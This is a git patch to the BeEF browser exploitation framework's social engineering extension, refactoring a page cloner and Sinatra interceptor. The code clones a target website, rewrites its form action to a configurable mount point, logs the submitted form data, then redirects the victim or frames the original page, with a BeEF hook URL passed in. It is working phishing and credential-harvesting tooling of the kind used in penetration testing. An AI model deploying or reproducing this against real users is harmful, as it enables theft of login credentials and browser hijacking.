From 6409b3d98fe1d06f257d121fea3b01292ad88789 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 29 Aug 2012 22:36:24 +0100 Subject: [PATCH] Social Eng. extension: mount point for phishing page is not configurable, refactored Interceptor initialization using config settings --- .../web_cloner/interceptor.rb | 24 ++++++++----------- .../web_cloner/web_cloner.rb | 15 ++++++++---- 2 files changed, 21 insertions(+), 18 deletions(-) diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb index 53ea3314f..3cf6551d3 100644 --- a/extensions/social_engineering/web_cloner/interceptor.rb +++ b/extensions/social_engineering/web_cloner/interceptor.rb @@ -16,25 +16,21 @@ module BeEF module Extension module SocialEngineering - + require 'sinatra/base' class Interceptor < Sinatra::Base - def initialize(file_path, redirect_to, frameable, beef_hook) - super self - file = File.open(file_path,'r') - @cloned_page = file.read - @redirect_to = redirect_to - @frameable = frameable - @beef_hook = beef_hook - file.close - print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized." + configure do + set :show_exceptions, false end # intercept GET get "/" do print_info "GET request" print_info "Referer: #{request.referer}" - @cloned_page + file = File.open(settings.file_path,'r') + cloned_page = file.read + file.close + cloned_page end # intercept POST @@ -45,12 +41,12 @@ module BeEF print_info "Intercepted data:" print_info data - if @frameable + if settings.frameable print_info "Page can be framed :-) Loading original URL into iFrame..." - "\n" + "\n" else print_info "Page can not be framed :-) Redirecting to original URL..." - redirect @redirect_to + redirect settings.redirect_to end end end diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb index 0648b91f0..13c799ded 100644 --- a/extensions/social_engineering/web_cloner/web_cloner.rb +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -27,7 +27,7 @@ module BeEF @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}" end - def clone_page(url) + def clone_page(url, mount) print_info "Cloning page at URL #{url}" uri = URI(url) output = uri.host @@ -53,7 +53,7 @@ module BeEF end count += 1 end - line_attrs[count] = "action=\"/#{output}\"" + line_attrs[count] = "action=\"#{mount}\"" mod_form = line_attrs.join(" ") print_info "Form action value changed to / in order to be intercepted." out_file.print mod_form @@ -72,8 +72,15 @@ module BeEF # Check if the original URL can be framed frameable = is_frameable(url) - @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook)) - print_info "Mounting cloned page on URL [/#{output}]" + + interceptor = BeEF::Extension::SocialEngineering::Interceptor + interceptor.set :file_path, file_path + interceptor.set :redirect_to, url + interceptor.set :frameable, frameable + interceptor.set :beef_hook, @beef_hook + + @http_server.mount("#{mount}", interceptor.new) + print_info "Mounting cloned page on URL [#{mount}]" @http_server.remap end